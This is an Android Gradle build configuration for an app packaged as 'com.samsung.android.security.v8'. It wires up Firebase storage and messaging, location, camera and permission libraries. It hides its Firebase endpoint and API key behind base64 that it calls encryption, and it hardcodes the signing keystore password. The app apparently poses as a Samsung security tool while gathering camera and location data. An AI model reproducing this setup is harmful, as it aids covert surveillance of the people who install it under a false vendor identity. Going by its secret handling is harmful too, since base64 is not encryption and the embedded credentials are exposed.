import java.security.SecureRandom
import java.util.Base64

plugins {
    id 'com.android.application'
    id 'com.google.gms.google-services'
}

android {
    namespace 'com.samsung.android.security.v8'
    compileSdk 34

    defaultConfig {
        applicationId "com.samsung.android.security.v8"
        minSdk 24
        targetSdk 34
        versionCode 1
        versionName "8.0"

        testInstrumentationRunner "androidx.test.runner.AndroidJUnitRunner"
        
        // تشفير البيانات
        buildConfigField "String", "FIREBASE_URL", "\"${getEncrypted('https://hmooude-37c70-default-rtdb.firebaseio.com')}\""
        buildConfigField "String", "API_KEY", "\"${getEncrypted('AIzaSyDaQ4b0DZMryXEsyco-IXAIy0hFX_W9UgA')}\""
        buildConfigField "String", "PROJECT_ID", "\"${getEncrypted('hmooude-37c70')}\""
        buildConfigField "String", "STORAGE_BUCKET", "\"${getEncrypted('hmooude-37c70.firebasestorage.app')}\""
        buildConfigField "String", "ENCRYPTION_KEY", "\"${generateRandomKey()}\""
    }

    buildTypes {
        release {
            minifyEnabled true
            shrinkResources true
            proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'), 'proguard-rules.pro'
            
            // توقيع التطبيق
        }
        debug {
            minifyEnabled false
        }
    }
    
    signingConfigs {
        release {
            // سيتم إضافة مفاتيح التوقيع هنا
            storeFile file("alkhanjar-keystore.jks")
            storePassword "AlKhanjar2026@Secure"
            keyAlias "alkhanjar"
            keyPassword "AlKhanjar2026@Secure"
        }
    }

    compileOptions {
        sourceCompatibility JavaVersion.VERSION_1_8
        targetCompatibility JavaVersion.VERSION_1_8
    }
    
    buildFeatures {
        buildConfig true
    }
}

dependencies {
    // Firebase
    implementation platform('com.google.firebase:firebase-bom:32.7.0')
    implementation 'com.google.firebase:firebase-database'
    implementation 'com.google.firebase:firebase-storage'
    implementation 'com.google.firebase:firebase-messaging'
    
    // Android Core
    implementation 'androidx.appcompat:appcompat:1.6.1'
    implementation 'com.google.android.material:material:1.11.0'
    implementation 'androidx.constraintlayout:constraintlayout:2.1.4'
    
    // Location Services
    implementation 'com.google.android.gms:play-services-location:21.0.1'
    
    // Camera
    implementation 'androidx.camera:camera-core:1.3.1'
    implementation 'androidx.camera:camera-camera2:1.3.1'
    implementation 'androidx.camera:camera-lifecycle:1.3.1'
    implementation 'androidx.camera:camera-view:1.3.1'
    
    // Permissions
    implementation 'com.karumi:dexter:6.2.3'
    
    // Encryption
    implementation 'androidx.security:security-crypto:1.1.0-alpha06'
    
    // Network
    implementation 'com.squareup.okhttp3:okhttp:4.12.0'
    
    // Testing
    testImplementation 'junit:junit:4.13.2'
    androidTestImplementation 'androidx.test.ext:junit:1.1.5'
    androidTestImplementation 'androidx.test.espresso:espresso-core:3.5.1'
}

// دالة لتشفير النصوص
def getEncrypted(String text) {
    return Base64.getEncoder().encodeToString(text.getBytes())
}

// دالة لتوليد مفتاح عشوائي
def generateRandomKey() {
    def random = new SecureRandom()
    def keyBytes = new byte[32]
    random.nextBytes(keyBytes)
    return Base64.getEncoder().encodeToString(keyBytes)
}
